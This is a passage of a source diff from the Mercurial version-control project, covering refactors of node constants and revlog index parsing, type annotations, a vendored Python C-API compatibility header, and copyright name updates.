sidedatamod.SD_FILES, + (sidedatamod.SD_FILES,), + copies_sidedata_computer, + ) + + def getsidedataadder(srcrepo, destrepo): use_w = srcrepo.ui.configbool(b'experimental', b'worker.repository-upgrade') if pycompat.iswindows or not use_w: @@ -882,14 +914,14 @@ data = {}, False if util.safehasattr(revlog, b'filteredrevs'): # this is a changelog # Is the data previously shelved ? 
- sidedata = staging.pop(rev, None) - if sidedata is None: + data = staging.pop(rev, None) + if data is None: # look at the queued result until we find the one we are lookig # for (shelve the other ones) r, data = sidedataq.get() while r != rev: staging[r] = data - r, sidedata = sidedataq.get() + r, data = sidedataq.get() tokens.release() sidedata, has_copies_info = data new_flag = 0 diff --git a/mercurial/minirst.py b/mercurial/minirst.py --- a/mercurial/minirst.py +++ b/mercurial/minirst.py @@ -1,6 +1,6 @@ # minirst.py - minimal reStructuredText parser # -# Copyright 2009, 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009, 2010 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -158,7 +158,7 @@ _optionre = re.compile( br'^(-([a-zA-Z0-9]), )?(--[a-z0-9-]+)' br'((.*) +)(.*)$' ) -_fieldre = re.compile(br':(?![: ])([^:]*)(?<! ):[ ]+(.*)') +_fieldre = re.compile(br':(?![: ])((?:\:|[^:])*)(?<! ):[ ]+(.*)') _definitionre = re.compile(br'[^ ]') _tablere = re.compile(br'(=+\s+)*=+') @@ -229,7 +229,7 @@ m = _fieldre.match(blocks[j][b'lines'][0]) key, rest = m.groups() blocks[j][b'lines'][0] = rest - blocks[j][b'key'] = key + blocks[j][b'key'] = key.replace(br'\:', b':') j += 1 i = j + 1 diff --git a/mercurial/mpatch.c b/mercurial/mpatch.c --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -14,7 +14,7 @@ allocation of intermediate Python objects. Working memory is about 2x the total number of hunks. - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. 
diff --git a/mercurial/narrowspec.py b/mercurial/narrowspec.py --- a/mercurial/narrowspec.py +++ b/mercurial/narrowspec.py @@ -329,7 +329,6 @@ trackeddirty = status.modified + status.added clean = status.clean if assumeclean: - assert not trackeddirty clean.extend(lookup) else: trackeddirty.extend(lookup) diff --git a/mercurial/node.py b/mercurial/node.py --- a/mercurial/node.py +++ b/mercurial/node.py @@ -1,6 +1,6 @@ # node.py - basic nodeid manipulation for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -21,29 +21,48 @@ raise TypeError(e) -nullrev = -1 -# In hex, this is '0000000000000000000000000000000000000000' -nullid = b"\0" * 20 -nullhex = hex(nullid) +def short(node): + return hex(node[:6]) + -# Phony node value to stand-in for new files in some uses of -# manifests. -# In hex, this is '2121212121212121212121212121212121212121' -newnodeid = b'!!!!!!!!!!!!!!!!!!!!' 
-# In hex, this is '3030303030303030303030303030306164646564' -addednodeid = b'000000000000000added' -# In hex, this is '3030303030303030303030306d6f646966696564' -modifiednodeid = b'000000000000modified' +nullrev = -1 -wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid} - -# pseudo identifiers for working directory -# (they are experimental, so don't add too many dependencies on them) +# pseudo identifier for working directory +# (experimental, so don't add too many dependencies on it) wdirrev = 0x7FFFFFFF -# In hex, this is 'ffffffffffffffffffffffffffffffffffffffff' -wdirid = b"\xff" * 20 -wdirhex = hex(wdirid) -def short(node): - return hex(node[:6]) +class sha1nodeconstants(object): + nodelen = 20 + + # In hex, this is '0000000000000000000000000000000000000000' + nullid = b"\0" * nodelen + nullhex = hex(nullid) + + # Phony node value to stand-in for new files in some uses of + # manifests. + # In hex, this is '2121212121212121212121212121212121212121' + newnodeid = b'!!!!!!!!!!!!!!!!!!!!' 
+ # In hex, this is '3030303030303030303030303030306164646564' + addednodeid = b'000000000000000added' + # In hex, this is '3030303030303030303030306d6f646966696564' + modifiednodeid = b'000000000000modified' + + wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid} + + # pseudo identifier for working directory + # (experimental, so don't add too many dependencies on it) + # In hex, this is 'ffffffffffffffffffffffffffffffffffffffff' + wdirid = b"\xff" * nodelen + wdirhex = hex(wdirid) + + +# legacy starting point for porting modules +nullid = sha1nodeconstants.nullid +nullhex = sha1nodeconstants.nullhex +newnodeid = sha1nodeconstants.newnodeid +addednodeid = sha1nodeconstants.addednodeid +modifiednodeid = sha1nodeconstants.modifiednodeid +wdirfilenodeids = sha1nodeconstants.wdirfilenodeids +wdirid = sha1nodeconstants.wdirid +wdirhex = sha1nodeconstants.wdirhex diff --git a/mercurial/obsolete.py b/mercurial/obsolete.py --- a/mercurial/obsolete.py +++ b/mercurial/obsolete.py @@ -560,10 +560,11 @@ # parents: (tuple of nodeid) or None, parents of predecessors # None is used when no data has been recorded - def __init__(self, svfs, defaultformat=_fm1version, readonly=False): + def __init__(self, repo, svfs, defaultformat=_fm1version, readonly=False): # caches for various obsolescence related cache self.caches = {} self.svfs = svfs + self.repo = repo self._defaultformat = defaultformat self._readonly = readonly @@ -806,7 +807,7 @@ if defaultformat is not None: kwargs['defaultformat'] = defaultformat readonly = not isenabled(repo, createmarkersopt) - store = obsstore(repo.svfs, readonly=readonly, **kwargs) + store = obsstore(repo, repo.svfs, readonly=readonly, **kwargs) if store and readonly: ui.warn( _(b'obsolete feature not enabled but %i markers found!\n') diff --git a/mercurial/parser.py b/mercurial/parser.py --- a/mercurial/parser.py +++ b/mercurial/parser.py @@ -1,6 +1,6 @@ # parser.py - simple top-down operator precedence parser for mercurial # -# Copyright 
2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pathutil.py b/mercurial/pathutil.py --- a/mercurial/pathutil.py +++ b/mercurial/pathutil.py @@ -15,11 +15,21 @@ util, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Callable, + Iterator, + Optional, + ) + + rustdirs = policy.importrust('dirstate', 'Dirs') parsers = policy.importmod('parsers') def _lowerclean(s): + # type: (bytes) -> bytes return encoding.hfsignoreclean(s.lower()) @@ -59,6 +69,7 @@ self.normcase = lambda x: x def __call__(self, path, mode=None): + # type: (bytes, Optional[Any]) -> None """Check the relative path. path may contain a pattern (e.g. foodir/**.txt)""" @@ -119,6 +130,7 @@ self.audited.add(normpath) def _checkfs(self, prefix, path): + # type: (bytes, bytes) -> None """raise exception if a file system backed check fails""" curpath = os.path.join(self.root, prefix) try: @@ -143,6 +155,7 @@ raise error.Abort(msg % (path, pycompat.bytestr(prefix))) def check(self, path): + # type: (bytes) -> bool try: self(path) return True @@ -164,6 +177,7 @@ def canonpath(root, cwd, myname, auditor=None): + # type: (bytes, bytes, bytes, Optional[pathauditor]) -> bytes """return the canonical path of myname, given cwd and root >>> def check(root, cwd, myname): @@ -266,6 +280,7 @@ def normasprefix(path): + # type: (bytes) -> bytes """normalize the specified path as path prefix Returned value can be used safely for "p.startswith(prefix)", @@ -289,6 +304,7 @@ def finddirs(path): + # type: (bytes) -> Iterator[bytes] pos = path.rfind(b'/') while pos != -1: yield path[:pos] @@ -318,6 +334,7 @@ addpath(f) def addpath(self, path): + # type: (bytes) -> None dirs = self._dirs for base in finddirs(path): if base.endswith(b'/'): @@ -330,6 +347,7 @@ dirs[base] = 1 def delpath(self, path): + # type: (bytes) -> 
None dirs = self._dirs for base in finddirs(path): if dirs[base] > 1: @@ -341,6 +359,7 @@ return iter(self._dirs) def __contains__(self, d): + # type: (bytes) -> bool return d in self._dirs @@ -355,4 +374,4 @@ # rather not let our internals know that we're thinking in posix terms # - instead we'll let them be oblivious. join = posixpath.join -dirname = posixpath.dirname +dirname = posixpath.dirname # type: Callable[[bytes], bytes] diff --git a/mercurial/phases.py b/mercurial/phases.py --- a/mercurial/phases.py +++ b/mercurial/phases.py @@ -127,10 +127,32 @@ util, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Callable, + Dict, + Iterable, + List, + Optional, + Set, + Tuple, + ) + from . import ( + localrepo, + ui as uimod, + ) + + Phaseroots = Dict[int, Set[bytes]] + Phasedefaults = List[ + Callable[[localrepo.localrepository, Phaseroots], Phaseroots] + ] + + _fphasesentry = struct.Struct(b'>i20s') # record phase index -public, draft, secret = range(3) +public, draft, secret = range(3) # type: int archived = 32 # non-continuous for compatibility internal = 96 # non-continuous for compatibility allphases = (public, draft, secret, archived, internal) @@ -154,11 +176,13 @@ def supportinternal(repo): + # type: (localrepo.localrepository) -> bool """True if the internal phase can be used on a repository""" return requirements.INTERNAL_PHASE_REQUIREMENT in repo.requirements def _readroots(repo, phasedefaults=None): + # type: (localrepo.localrepository, Optional[Phasedefaults]) -> Tuple[Phaseroots, bool] """Read phase roots from disk phasedefaults is a list of fn(repo, roots) callable, which are @@ -191,6 +215,7 @@ def binaryencode(phasemapping): + # type: (Dict[int, List[bytes]]) -> bytes """encode a 'phase -> nodes' mapping into a binary stream The revision lists are encoded as (phase, root) pairs. @@ -203,6 +228,7 @@ def binarydecode(stream): + # type: (...) 
-> Dict[int, List[bytes]] """decode a binary stream into a 'phase -> nodes' mapping The (phase, root) pairs are turned back into a dictionary with @@ -321,6 +347,7 @@ class phasecache(object): def __init__(self, repo, phasedefaults, _load=True): + # type: (localrepo.localrepository, Optional[Phasedefaults], bool) -> None if _load: # Cheap trick to allow shallow-copy without copy module self.phaseroots, self.dirty = _readroots(repo, phasedefaults) @@ -330,6 +357,7 @@ self.opener = repo.svfs def hasnonpublicphases(self, repo): + # type: (localrepo.localrepository) -> bool """detect if there are revisions with non-public phase""" repo = repo.unfiltered() cl = repo.changelog @@ -343,6 +371,7 @@ ) def nonpublicphaseroots(self, repo): + # type: (localrepo.localrepository) -> Set[bytes] """returns the roots of all non-public phases The roots are not minimized, so if the secret revisions are @@ -362,6 +391,8 @@ ) def getrevset(self, repo, phases, subset=None): + # type: (localrepo.localrepository, Iterable[int], Optional[Any]) -> Any + # TODO: finish typing this """return a smartset for the given phases""" self.loadphaserevs(repo) # ensure phase's sets are loaded phases = set(phases) @@ -457,6 +488,7 @@ self._loadedrevslen = len(cl) def loadphaserevs(self, repo): + # type: (localrepo.localrepository) -> None """ensure phase information is loaded in the object""" if self._phasesets is None: try: @@ -470,6 +502,7 @@ self._phasesets = None def phase(self, repo, rev): + # type: (localrepo.localrepository, int) -> int # We need a repo argument here to be able to build _phasesets # if necessary. The repository instance is not stored in # phasecache to avoid reference cycles. The changelog instance @@ -652,6 +685,7 @@ return False def filterunknown(self, repo): + # type: (localrepo.localrepository) -> None """remove unknown nodes from the phase boundary Nothing is lost as unknown nodes only hold data for their descendants. 
@@ -729,6 +763,7 @@ def listphases(repo): + # type: (localrepo.localrepository) -> Dict[bytes, bytes] """List phases root for serialization over pushkey""" # Use ordered dictionary so behavior is deterministic. keys = util.sortdict() @@ -760,6 +795,7 @@ def pushphase(repo, nhex, oldphasestr, newphasestr): + # type: (localrepo.localrepository, bytes, bytes, bytes) -> bool """List phases root for serialization over pushkey""" repo = repo.unfiltered() with repo.lock(): @@ -909,6 +945,7 @@ def newcommitphase(ui): + # type: (uimod.ui) -> int """helper to get the target phase of new commit Handle all possible values for the phases.new-commit options. @@ -924,11 +961,13 @@ def hassecret(repo): + # type: (localrepo.localrepository) -> bool """utility function that check if a repo have any secret changeset.""" return bool(repo._phasecache.phaseroots[secret]) def preparehookargs(node, old, new): + # type: (bytes, Optional[int], Optional[int]) -> Dict[bytes, bytes] if old is None: old = b'' else: diff --git a/mercurial/posix.py b/mercurial/posix.py --- a/mercurial/posix.py +++ b/mercurial/posix.py @@ -1,6 +1,6 @@ # posix.py - Posix utility function implementations for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/profiling.py b/mercurial/profiling.py --- a/mercurial/profiling.py +++ b/mercurial/profiling.py @@ -228,7 +228,7 @@ if self._output == b'blackbox': self._fp = util.stringio() elif self._output: - path = self._ui.expandpath(self._output) + path = util.expandpath(self._output) self._fp = open(path, b'wb') elif pycompat.iswindows: # parse escape sequence by win32print() diff --git a/mercurial/pure/bdiff.py b/mercurial/pure/bdiff.py --- a/mercurial/pure/bdiff.py +++ b/mercurial/pure/bdiff.py @@ -1,6 +1,6 @@ # bdiff.py - Python implementation of bdiff.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/charencode.py b/mercurial/pure/charencode.py --- a/mercurial/pure/charencode.py +++ b/mercurial/pure/charencode.py @@ -1,6 +1,6 @@ # charencode.py - miscellaneous character encoding # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/mpatch.py b/mercurial/pure/mpatch.py --- a/mercurial/pure/mpatch.py +++ b/mercurial/pure/mpatch.py @@ -1,6 +1,6 @@ # mpatch.py - Python implementation of mpatch.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/pure/osutil.py b/mercurial/pure/osutil.py --- a/mercurial/pure/osutil.py +++ b/mercurial/pure/osutil.py @@ -1,6 +1,6 @@ # osutil.py - pure Python version of osutil.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -1,6 +1,6 @@ # parsers.py - Python implementation of parsers.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -17,6 +17,7 @@ ) from ..revlogutils import nodemap as nodemaputil +from ..revlogutils import constants as revlog_constants stringio = pycompat.bytesio @@ -33,13 +34,6 @@ return x -indexformatng = b">Qiiiiii20s12x" -indexfirst = struct.calcsize(b'Q') -sizeint = struct.calcsize(b'i') -indexsize = struct.calcsize(indexformatng) -nullitem = (0, 0, 0, -1, -1, -1, -1, nullid) - - def gettype(q): return int(q & 0xFFFF) @@ -49,6 +43,19 @@ class BaseIndexObject(object): + # Format of an index entry according to Python's `struct` language + index_format = revlog_constants.INDEX_ENTRY_V1 + # Size of a C unsigned long long int, platform independent + big_int_size = struct.calcsize(b'>Q') + # Size of a C long int, platform independent + int_size = struct.calcsize(b'>i') + # An empty index entry, used as a default value to be overridden, or nullrev + null_item = (0, 0, 0, -1, -1, -1, -1, nullid) + + @util.propertycache + def entry_size(self): + return self.index_format.size + @property def nodemap(self): msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]" @@ 
-94,7 +101,7 @@ def append(self, tup): if '_nodemap' in vars(self): self._nodemap[tup[7]] = len(self) - data = _pack(indexformatng, *tup) + data = self.index_format.pack(*tup) self._extra.append(data) def _check_index(self, i): @@ -105,14 +112,14 @@ def __getitem__(self, i): if i == -1: - return nullitem + return self.null_item self._check_index(i) if i >= self._lgt: data = self._extra[i - self._lgt] else: index = self._calculate_index(i) - data = self._data[index : index + indexsize] - r = _unpack(indexformatng, data) + data = self._data[index : index + self.entry_size] + r = self.index_format.unpack(data) if self._lgt and i == 0: r = (offset_type(0, gettype(r[0])),) + r[1:] return r @@ -120,13 +127,13 @@ class IndexObject(BaseIndexObject): def __init__(self, data): - assert len(data) % indexsize == 0 + assert len(data) % self.entry_size == 0 self._data = data - self._lgt = len(data) // indexsize + self._lgt = len(data) // self.entry_size self._extra = [] def _calculate_index(self, i): - return i * indexsize + return i * self.entry_size def __delitem__(self, i): if not isinstance(i, slice) or not i.stop == -1 or i.step is not None: @@ -135,7 +142,7 @@ self._check_index(i) self._stripnodes(i) if i < self._lgt: - self._data = self._data[: i * indexsize] + self._data = self._data[: i * self.entry_size] self._lgt = i self._extra = [] else: @@ -198,14 +205,16 @@ if lgt is not None: self._offsets = [0] * lgt count = 0 - while off <= len(self._data) - indexsize: + while off <= len(self._data) - self.entry_size: + start = off + self.big_int_size (s,) = struct.unpack( - b'>i', self._data[off + indexfirst : off + sizeint + indexfirst] + b'>i', + self._data[start : start + self.int_size], ) if lgt is not None: self._offsets[count] = off count += 1 - off += indexsize + s + off += self.entry_size + s if off != len(self._data): raise ValueError(b"corrupted data") return count @@ -227,10 +236,68 @@ return self._offsets[i] -def parse_index2(data, inline): +def parse_index2(data, 
inline, revlogv2=False): if not inline: - return IndexObject(data), None - return InlinedIndexObject(data, inline), (0, data) + cls = IndexObject2 if revlogv2 else IndexObject + return cls(data), None + cls = InlinedIndexObject2 if revlogv2 else InlinedIndexObject + return cls(data, inline), (0, data) + + +class Index2Mixin(object): + index_format = revlog_constants.INDEX_ENTRY_V2 + null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) + + def replace_sidedata_info(self, i, sidedata_offset, sidedata_length): + """ + Replace an existing index entry's sidedata offset and length with new + ones. + This cannot be used outside of the context of sidedata rewriting, + inside the transaction that creates the revision `i`. + """ + if i < 0: + raise KeyError + self._check_index(i) + sidedata_format = b">Qi" + packed_size = struct.calcsize(sidedata_format) + if i >= self._lgt: + packed = _pack(sidedata_format, sidedata_offset, sidedata_length) + old = self._extra[i - self._lgt] + new = old[:64] + packed + old[64 + packed_size :] + self._extra[i - self._lgt] = new + else: + msg = b"cannot rewrite entries outside of this transaction" + raise KeyError(msg) + + +class IndexObject2(Index2Mixin, IndexObject): + pass + + +class InlinedIndexObject2(Index2Mixin, InlinedIndexObject): + def _inline_scan(self, lgt): + sidedata_length_pos = 72 + off = 0 + if lgt is not None: + self._offsets = [0] * lgt + count = 0 + while off <= len(self._data) - self.entry_size: + start = off + self.big_int_size + (data_size,) = struct.unpack( + b'>i', + self._data[start : start + self.int_size], + ) + start = off + sidedata_length_pos + (side_data_size,) = struct.unpack( + b'>i', self._data[start : start + self.int_size] + ) + if lgt is not None: + self._offsets[count] = off + count += 1 + off += self.entry_size + data_size + side_data_size + if off != len(self._data): + raise ValueError(b"corrupted data") + return count def parse_index_devel_nodemap(data, inline): diff --git a/mercurial/pushkey.py 
b/mercurial/pushkey.py --- a/mercurial/pushkey.py +++ b/mercurial/pushkey.py @@ -1,6 +1,6 @@ # pushkey.py - dispatching for pushing and pulling keys # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pvec.py b/mercurial/pvec.py --- a/mercurial/pvec.py +++ b/mercurial/pvec.py @@ -1,6 +1,6 @@ # pvec.py - probabilistic vector clocks for Mercurial # -# Copyright 2012 Matt Mackall <mpm@selenic.com> +# Copyright 2012 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pythoncapi_compat.h b/mercurial/pythoncapi_compat.h new file mode 100644 --- /dev/null +++ b/mercurial/pythoncapi_compat.h @@ -0,0 +1,283 @@ +// Header file providing new functions of the Python C API to old Python +// versions. +// +// File distributed under the MIT license. +// +// Homepage: +// https://github.com/pythoncapi/pythoncapi_compat +// +// Latest version: +// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h + +#ifndef PYTHONCAPI_COMPAT +#define PYTHONCAPI_COMPAT + +#ifdef __cplusplus +extern "C" { +#endif + +#include <Python.h> +#include "frameobject.h" // PyFrameObject, PyFrame_GetBack() + + +/* VC 2008 doesn't know about the inline keyword. */ +#if defined(_MSC_VER) && _MSC_VER < 1900 +#define inline __forceinline +#endif + +// Cast argument to PyObject* type. 
+#ifndef _PyObject_CAST +# define _PyObject_CAST(op) ((PyObject*)(op)) +#endif + + +// bpo-42262 added Py_NewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef) +static inline PyObject* _Py_NewRef(PyObject *obj) +{ + Py_INCREF(obj); + return obj; +} +#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-42262 added Py_XNewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef) +static inline PyObject* _Py_XNewRef(PyObject *obj) +{ + Py_XINCREF(obj); + return obj; +} +#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT) +static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt) +{ + ob->ob_refcnt = refcnt; +} +#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt) +#endif + + +// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE) +static inline void +_Py_SET_TYPE(PyObject *ob, PyTypeObject *type) +{ + ob->ob_type = type; +} +#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type) +#endif + + +// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE) +static inline void +_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size) +{ + ob->ob_size = size; +} +#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size) +#endif + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyCodeObject* +PyFrame_GetCode(PyFrameObject *frame) +{ + PyCodeObject *code; + assert(frame != NULL); + code = frame->f_code; + assert(code != NULL); + Py_INCREF(code); + return code; +} +#endif + +static inline PyCodeObject* +_PyFrame_GetCodeBorrow(PyFrameObject *frame) +{ + PyCodeObject *code = PyFrame_GetCode(frame); + Py_DECREF(code); + return code; // borrowed reference +} + + +// bpo-40421 
added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyFrame_GetBack(PyFrameObject *frame) +{ + PyFrameObject *back; + assert(frame != NULL); + back = frame->f_back; + Py_XINCREF(back); + return back; +} +#endif + +static inline PyFrameObject* +_PyFrame_GetBackBorrow(PyFrameObject *frame) +{ + PyFrameObject *back = PyFrame_GetBack(frame); + Py_XDECREF(back); + return back; // borrowed reference +} + + +// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyThreadState_GetInterpreter(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->interp; +} +#endif + + +// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyThreadState_GetFrame(PyThreadState *tstate) +{ + PyFrameObject *frame; + assert(tstate != NULL); + frame = tstate->frame; + Py_XINCREF(frame); + return frame; +} +#endif + +static inline PyFrameObject* +_PyThreadState_GetFrameBorrow(PyThreadState *tstate) +{ + PyFrameObject *frame = PyThreadState_GetFrame(tstate); + Py_XDECREF(frame); + return frame; // borrowed reference +} + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyInterpreterState_Get(void) +{ + PyThreadState *tstate; + PyInterpreterState *interp; + + tstate = PyThreadState_GET(); + if (tstate == NULL) { + Py_FatalError("GIL released (tstate is NULL)"); + } + interp = tstate->interp; + if (interp == NULL) { + Py_FatalError("no current interpreter"); + } + return interp; +} +#endif + + +// bpo-39947 added PyThreadState_GetID() to Python 3.9.0a6 +#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6 +static inline uint64_t +PyThreadState_GetID(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->id; +} +#endif + + +// bpo-37194 added PyObject_CallNoArgs() to
Python 3.9.0a1 +#if PY_VERSION_HEX < 0x030900A1 +static inline PyObject* +PyObject_CallNoArgs(PyObject *func) +{ + return PyObject_CallFunctionObjArgs(func, NULL); +} +#endif + + +// bpo-39245 made PyObject_CallOneArg() public (previously called +// _PyObject_CallOneArg) in Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 +static inline PyObject* +PyObject_CallOneArg(PyObject *func, PyObject *arg) +{ + return PyObject_CallFunctionObjArgs(func, arg, NULL); +} +#endif + + +// bpo-40024 added PyModule_AddType() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline int +PyModule_AddType(PyObject *module, PyTypeObject *type) +{ + const char *name, *dot; + + if (PyType_Ready(type) < 0) { + return -1; + } + + // inline _PyType_Name() + name = type->tp_name; + assert(name != NULL); + dot = strrchr(name, '.'); + if (dot != NULL) { + name = dot + 1; + } + + Py_INCREF(type); + if (PyModule_AddObject(module, name, (PyObject *)type) < 0) { + Py_DECREF(type); + return -1; + } + + return 0; +} +#endif + + +// bpo-40241 added PyObject_GC_IsTracked() to Python 3.9.0a6. +// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2. +#if PY_VERSION_HEX < 0x030900A6 +static inline int +PyObject_GC_IsTracked(PyObject* obj) +{ + return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj)); +} +#endif + +// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6. +// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final. 
+#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0 +static inline int +PyObject_GC_IsFinalized(PyObject *obj) +{ + return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1)); +} +#endif + + +// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE) +static inline int +_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) { + return ob->ob_type == type; +} +#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type) +#endif + + +#ifdef __cplusplus +} +#endif +#endif // PYTHONCAPI_COMPAT diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -1,7 +1,7 @@ # repair.py - functions for repository repair for mercurial # # Copyright 2005, 2006 Chris Mason <mason@suse.com> -# Copyright 2007 Matt Mackall +# Copyright 2007 Olivia Mackall # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -28,11 +28,11 @@ pycompat, requirements, scmutil, - util, ) from .utils import ( hashutil, stringutil, + urlutil, ) @@ -245,7 +245,7 @@ tmpbundleurl = b'bundle:' + vfs.join(tmpbundlefile) txnname = b'strip' if not isinstance(gen, bundle2.unbundle20): - txnname = b"strip\n%s" % util.hidepassword(tmpbundleurl) + txnname = b"strip\n%s" % urlutil.hidepassword(tmpbundleurl) with repo.transaction(txnname) as tr: bundle2.applybundle( repo, gen, tr, source=b'strip', url=tmpbundleurl @@ -308,11 +308,12 @@ if not tostrip: return None - newbmtarget, updatebm = _bookmarkmovements(repo, tostrip) + backupfile = None if backup: node = tostrip[0] backupfile = _createstripbackup(repo, tostrip, node, topic) + newbmtarget, updatebm = _bookmarkmovements(repo, tostrip) with repo.transaction(b'strip') as tr: phases.retractboundary(repo, tr, phases.archived, tostrip) bmchanges = [(m, repo[newbmtarget].node()) for m in updatebm] @@ -427,7 +428,7 @@ if scmutil.istreemanifest(repo): # This logic is safe if treemanifest isn't enabled, but also # pointless, so we skip it if treemanifest isn't enabled. - for unencoded, encoded, size in repo.store.datafiles(): + for t, unencoded, encoded, size in repo.store.datafiles(): if unencoded.startswith(b'meta/') and unencoded.endswith( b'00manifest.i' ): @@ -442,7 +443,7 @@ """ repo = repo.unfiltered() - if b'fncache' not in repo.requirements: + if requirements.FNCACHE_REQUIREMENT not in repo.requirements: ui.warn( _( b'(not rebuilding fncache because repository does not ' diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -1,12 +1,17 @@ # requirements.py - objects and functions related to repository requirements # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
